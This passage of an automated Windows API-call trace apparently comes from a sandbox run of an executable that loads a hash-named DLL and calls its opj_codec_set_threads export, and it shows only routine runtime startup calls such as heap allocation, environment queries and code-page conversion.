\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0111.142] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x100) returned 0x441c20 [0111.142] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7ff626f72300, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe")) returned 0x29 [0111.142] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x17e) returned 0x439aa0 [0111.142] RtlInitializeSListHead (in: ListHead=0x7ff626f72160 | out: ListHead=0x7ff626f72160) [0111.142] GetLastError () returned 0x0 [0111.142] SetLastError (dwErrCode=0x0) [0111.142] GetEnvironmentStringsW () returned 0x444680* [0111.142] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x9cc) returned 0x445060 [0111.142] FreeEnvironmentStringsW (penv=0x444680) returned 1 [0111.142] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x118) returned 0x43aa10 [0111.142] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x3e) returned 0x4409a0 [0111.142] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x5c) returned 0x430780 [0111.142] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x62) returned 0x4347a0 [0111.142] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x78) returned 0x43c6f0 [0111.142] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x62) returned 0x4355e0 [0111.142] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x28) returned 0x43b8f0 [0111.142] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x48) returned 0x440b30 [0111.142] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x1a) returned 0x43b6b0 [0111.142] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x3a) returned 0x440a90 [0111.142] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x62) returned 0x434510 [0111.142] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x2a) returned 0x43c770 [0111.142] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x2e) returned 0x434810 [0111.142] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x1c) returned 0x43b530 [0111.142] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xd2) returned 0x435cd0 [0111.142] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x7c) returned 0x434000 [0111.142] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x3a) returned 0x440360 [0111.143] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x90) returned 0x433c20 [0111.143] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x24) returned 0x43b620 [0111.143] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x30) returned 0x434580 [0111.143] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x36) returned 0x435650 [0111.143] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x3c) returned 0x440b80 [0111.143] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x52) returned 0x4393e0 [0111.143] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x3c) returned 0x440bd0 [0111.143] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xd6) returned 0x4351b0 [0111.143] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x2e) returned 0x4320d0 [0111.143] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x1e) returned 0x43b2c0 [0111.143] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x2c) returned 0x432110 [0111.143] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x54) returned 0x439680 [0111.143] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x52) returned 0x439620 [0111.143] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x24) returned 0x43b590 [0111.143] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x42) returned 0x440090 [0111.143] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x2c) returned 0x432150 [0111.143] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x44) returned 0x440ae0 [0111.143] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x24) returned 0x43b7a0 [0111.143] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x445060 | out: hHeap=0x430000) returned 1 [0111.143] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x1000) returned 0x444680 [0111.143] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff626f52580) returned 0x0 [0111.144] GetStartupInfoW (in: lpStartupInfo=0x14fea0 | out: lpStartupInfo=0x14fea0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0111.144] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_codec_set_threads" [0111.144] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_codec_set_threads", pNumArgs=0x14fe70 | out: pNumArgs=0x14fe70) returned 0x439770*="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" [0111.144] LoadLibraryW (lpLibFileName="C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll") returned 0x7ffc45e90000 [0111.149] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0111.149] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0111.149] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0111.150] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0111.150] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0111.151] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0111.151] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0111.152] GetProcessHeap () returned 0x430000 [0111.152] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0111.152] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0111.152] GetLastError () returned 0x0 [0111.152] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsGetValue") returned 0x7ffc5bfe3780 [0111.152] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0111.152] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x3c8) returned 0x445b10 [0111.153] SetLastError (dwErrCode=0x0) [0111.153] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x1200) returned 0x445ee0 [0111.156] GetStartupInfoW (in: lpStartupInfo=0x14f6f0 | out: lpStartupInfo=0x14f6f0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0111.156] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0111.156] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0111.156] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0111.156] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_codec_set_threads" [0111.156] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_codec_set_threads" [0111.157] GetACP () returned 0x4e4 [0111.157] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x228) returned 0x43aca0 [0111.157] IsValidCodePage (CodePage=0x4e4) returned 1 [0111.157] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f6b0 | out: lpCPInfo=0x14f6b0) returned 1 [0111.157] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14ef50 | out: lpCPInfo=0x14ef50) returned 1 [0111.157] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0111.157] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14eca0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿp") returned 256 [0111.157] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿp", cchSrc=256, lpCharType=0x14f270 | out: lpCharType=0x14f270) returned 1 [0111.157] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0111.157] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14ec40, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0111.157] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0111.157] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="LCMapStringEx") returned 0x7ffc5bfb5350 [0111.158] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0111.158] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14ea30, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0111.158] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f070, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ0\x0e\x91_ü\x7f", lpUsedDefaultChar=0x0) returned 256 [0111.158] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0111.158] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14ec40, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0111.158] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0111.158] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14ea30, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0111.158] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14f170, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0111.158] RtlInitializeSListHead (in: ListHead=0x7ffc45fcd4a0 | out: ListHead=0x7ffc45fcd4a0) [0111.158] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x1000) returned 0x4470f0 [0111.159] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x14f540, nSize=0x105 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe")) returned 0x29 [0111.159] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x7ffc5ecd0000 [0111.159] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="AreFileApisANSI") returned 0x7ffc5ecf4820 [0111.159] AreFileApisANSI () returned 1 [0111.159] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0111.159] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", cchWideChar=-1, lpMultiByteStr=0x7ffc45fcd6c0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpUsedDefaultChar=0x0) returned 42 [0111.160] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xcf) returned 0x434400 [0111.160] GetEnvironmentStringsW () returned 0x448100* [0111.160] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1254, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1254 [0111.160] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, 